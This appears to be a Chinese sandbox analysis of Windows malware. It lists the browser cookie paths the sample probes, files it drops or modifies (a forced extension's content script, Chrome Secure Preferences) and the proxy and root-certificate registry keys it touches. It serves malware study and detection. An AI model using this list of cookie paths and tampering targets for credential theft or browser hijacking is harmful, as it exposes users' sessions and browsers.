  • Z:\\xe7\xbd\x91\xe7\xae\xa1\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • X:\tools\db\360chrome\chrome\application\User Data\Default\Cookies
  • G:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360chrome\xe5\xb8\xa6\xe6\x8f\x92\xe4\xbb\xb6\chrome\User Data\Default\Cookies
  • C:\360llq\360chrome\chrome\User Data\Default\Cookies
  • H:\360\xe6\x9e\x81\xe9\x80\x9f\xe7\xbb\xbf\xe5\x8c\x96\User Data\Default\Cookies
  • C:\tools\chrome\User Data\Default\Cookies
  • C:\mysp\360chrome\chrome\User Data\Default\Cookies
  • X:\chrome\User Data\Default\Cookies
  • X:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Y:\tool\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • G:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\tools\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\xe7\xbb\xbf\xe8\x89\xb2\xe7\x89\x88\User Data\Default\Cookies
  • C:\chrome-bin\User Data\Default\Cookies
  • Y:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\360chrome\chrome\User Data\Default\Cookies
  • W:\\xe5\xb8\xb8\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • T:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\mysp\chrome-bin\User Data\Default\Cookies
  • C:\16053\User Data\Default\Cookies
  • X:\tools\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\program files\360\360\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\fyd.fyd-pc\appdata\local\User Data\Default\Cookies
  • C:\360jsllq\360chrome\chrome\User Data\Default\Cookies
  • W:\tools\360chrome\chrome\User Data\Default\Cookies
  • Y:\tools\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe8\xbe\x85\xe5\x8a\xa9\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • S:\360\360chrome\User Data\Default\Cookies
  • C:\\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • X:\\xe8\xbe\x85\xe5\x8a\xa9\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\chrome\chrome\User Data\Default\Cookies
  • C:\3\360\360chrome\chrome\User Data\Default\Cookies
  • C:\tool\360chromeportable\app\programfiles\User Data\Default\Cookies
  • Y:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360chrome\User Data\Default\Cookies
  • Y:\tool\360chrome\chrome\User Data\Default\Cookies
  • I:\360\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa811.0.2140\User Data\Default\Cookies
  • Z:\bak\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • C:\soft\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8c\360chrome\chrome\User Data\Default\Cookies
  • S:\\xe9\x80\x9a\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\program files (x86)\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe6\x96\xb0\xe7\x89\x88\chrome\User Data\Default\Cookies
  • E:\\xe5\x8f\xac\xe5\x94\xa4\xe6\xb8\xb8\xe6\x88\x8f\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • W:\tools\\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360jisu\User Data\Default\Cookies
  • B:\bcdata\8\User Data\Default\Cookies
  • C:\tools\chrome-bin\User Data\Default\Cookies
  • Z:\soft\360\360\360chrome\chrome\User Data\Default\Cookies
  • C:\mysp\chrome\chrome\User Data\Default\Cookies
  • I:\jhwwb\User Data\Default\Cookies
  • T:\t\xe7\x9b\x98\360chrome\chrome\User Data\Default\Cookies
  • G:\psar\360chrome\chrome\User Data\Default\Cookies
  • H:\tool\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\application\User Data\Default\Cookies
  • J:\360chrome\User Data\Default\Cookies
  • D:\360\360chrome\chrome\User Data\Default\Cookies
  • Y:\drv\1.\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • I:\360chrome\User Data\Default\Cookies
  • C:\program files\chrome\User Data\Default\Cookies
  • C:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\User Data\Default\Cookies
  • C:\temp\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\1\admini~1\appdata\local\360chr~1\chrome\User Data\Default\Cookies
  • C:\360\xe6\x9e\x81~1\360chr~1\chrome\User Data\Default\Cookies
  • C:\Users\adm\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • E:\users\administrator\appdata\local\360chrome\chrome\User Data\Default\Cookies
  • G:\360ie\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\360chr~1\chrome\applic~1\User Data\Default\Cookies
  • G:\mygame\360chrome\chrome\User Data\Default\Cookies
  • M:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8999\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • F:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • E:\\xe5\x85\xb6\xe5\xae\x83\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • G:\\xe5\x85\xb6\xe5\xae\x83\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • U:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • Y:\\xe5\x85\xb6\xe5\xae\x83\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • M:\\xe5\xb8\xb8\xe7\x94\xa8\xe8\xbd\xaf\xe4\xbb\xb6\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • H:\haijun\360chrome\chrome\User Data\Default\Cookies
  • Z:\123\360chrome\chrome\User Data\Default\Cookies
  • C:\360chr~1\chrome\User Data\Default\Cookies
  • C:\360jisu\360chr~1\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\User Data\Default\Cookies
  • G:\chrome\User Data\Default\Cookies
  • G:\User Data\Default\Cookies
  • M:\360jisu\User Data\Default\Cookies
  • H:\\xe5\x85\xb6\xe5\xae\x83\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\360chrome\chrome\User Data\Default\Cookies
  • G:\360js\360chrome\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.528\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.604\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.097\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.015\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.379\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.057\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\administrator\AppData\Local\360chrome\chrome\UserData\Default\Cookies
  • C:\Program Files (x86)\360\xe6\x9e\x81~1\360chr~1\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\temp\rar$exa0.272\\xe8\xb6\x85\xe6\x98\x9f\xe6\x99\xba\xe6\x85\xa7\xe6\xa0\x91\xe7\xbd\x91\xe8\xaf\xbe\xe5\x8a\xa9\xe6\x89\x8b\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\xe7\x89\x88v1.0.4\chrome\User Data\Default\Cookies
  • C:\Users\Administrator\AppData\Local\Chrome\User Data\Default\Cookies
  • C:\360\xe5\xae\x89\xe5\x85\xa8\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • U:\\xe5\xb8\xb8\xe7\x94\xa8\xe5\xb7\xa5\xe5\x85\xb7\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • Z:\360\xe6\x9e\x81\xe9\x80\x9f\xe6\xb5\x8f\xe8\xa7\x88\xe5\x99\xa8\User Data\Default\Cookies
  • C:\Windows\SysWOW64\shell32.dll
  • C:\
  • C:\Users\test\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
  • C:\Users\test\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000052.db
  • C:\Users\desktop.ini
  • C:\Users
  • C:\Users\test
  • C:\Users\test\Desktop\desktop.ini
  • C:\Windows\System32\tzres.dll
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences
  • C:\Windows\addins\xiaobai\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\xiaobai\Preferences
  • C:\Windows\addins\dbhelper.exe
  • C:\Users\test\AppData\Local\Temp\Preferences
  • C:\Windows\addins\xiaobai\paths.txt
  • C:\Windows\fclog_2019-12-10 23:37:12 >>>>>>>>> .txt
  • C:\Users\Administrator\AppData\Local\xbbrowser\User Data\Default\Secure Preferences
  • C:\Users\test\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-1.DLL
  • C:\Users\test\AppData\Local\Temp\ext-ms-win-kernel32-package-current-l1-1-0.DLL
  • C:\Windows\SysWOW64\svchost.exe
  • C:\Users\test\AppData\Local\Temp\32463211\....\
  • C:\Windows\System32\winhttp.dll
  • C:\Windows\WindowsShell.manifest
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\s[1].txt
  • C:\Windows\win.ini
  • C:\Windows\System32\dxtmsft.dll
  • C:\Windows\System32\dxtrans.dll
  • C:\Windows\SysWOW64\en-US\MLANG.dll.mui
修改的文件
  • C:\Windows\FeiOnline\down.ini
  • C:\Windows\SysWOW64\cqsfConfig.ini
  • C:\Windows\addins\ExtensionDll.dll
  • C:\Windows\addins\SuoLock.exe
  • C:\Windows\SysWOW64\audiodgx.dll
  • C:\Windows\SysWOW64\sesvc.exe
  • C:\Windows\fclog.txt
  • C:\Windows\SysWOW64\cacert.der
  • C:\Windows\fclog_2019-12-10 23:06:27 >>>>>>>>> .txt
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js\content-script.js
  • C:\Windows\addins\xiaobai\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js\content-script.js
  • C:\Windows\addins\Google\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\js\content-script.js
  • C:\Windows\addins\360\addins\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\360\Preferences
  • C:\Windows\addins\Google\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\Google\Preferences
  • C:\Windows\addins\360\paths.txt
  • C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences_Temp
  • C:\Windows\addins\xiaobai\Extensions\iachlejkcoodbgeaceeanllhflgcnhpe\1.0_0\manifest.json
  • C:\Windows\addins\xiaobai\Preferences
  • C:\Users\test\AppData\Local\Temp\Preferences
  • C:\Windows\addins\xiaobai\paths.txt
  • C:\Windows\fclog_2019-12-10 23:37:12 >>>>>>>>> .txt
  • C:\Users\Administrator\AppData\Local\xbbrowser\User Data\Default\Secure Preferences
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences
  • C:\Users\test\AppData\Local\Temp\32463211\....\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\32463211\TemporaryFile
  • C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\test@baidu[1].txt
  • C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\test@baidu[2].txt
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\s[1].txt
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\bd_logo1[1].png
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\baidu_resultlogo@2[1].png
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\baidu_jgylogo3[1].gif
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHDRIWWS\dnserrordiagoff_webOC[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IDL4J1KW\ErrorPageTemplate[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HEL4YQ7U\errorPageStrings[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHDRIWWS\httpErrorPagesScripts[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IDL4J1KW\background_gradient[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HEL4YQ7U\info_48[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHDRIWWS\bullet[1]
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IDL4J1KW\down[1]
删除的文件
  • C:\Windows\FeiOnline\down.ini
  • C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences
  • C:\program files (x86)\Google\Chrome\user data\Default\Preferences_Temp
  • C:\Users\Administrator\AppData\Local\xbbrowser\User Data\Default\Secure Preferences
  • C:\Users\test\AppData\Local\Temp\32463211\TemporaryFile\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\32463211\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\32463211
  • C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\test@baidu[1].txt
  • C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\test@baidu[2].txt
  • C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CB4GP22D\s[1].txt
注册表键
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1609
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
  • HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
  • HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
  • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A7217F919843199C958C128449DD52D2723B0A8A
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A7217F919843199C958C128449DD52D2723B0A8A\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D85213E038F309D02A40917B59E142368AE6B1C0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D85213E038F309D02A40917B59E142368AE6B1C0\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DBB84423C928ABE889D0E368FC3191D151DDB1AB
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DBB84423C928ABE889D0E368FC3191D151DDB1AB\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
  • HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3E2BF7F2031B96F38CE6C4D8A85D3E2D58476A0F
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3E2BF7F2031B96F38CE6C4D8A85D3E2D58476A0F\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
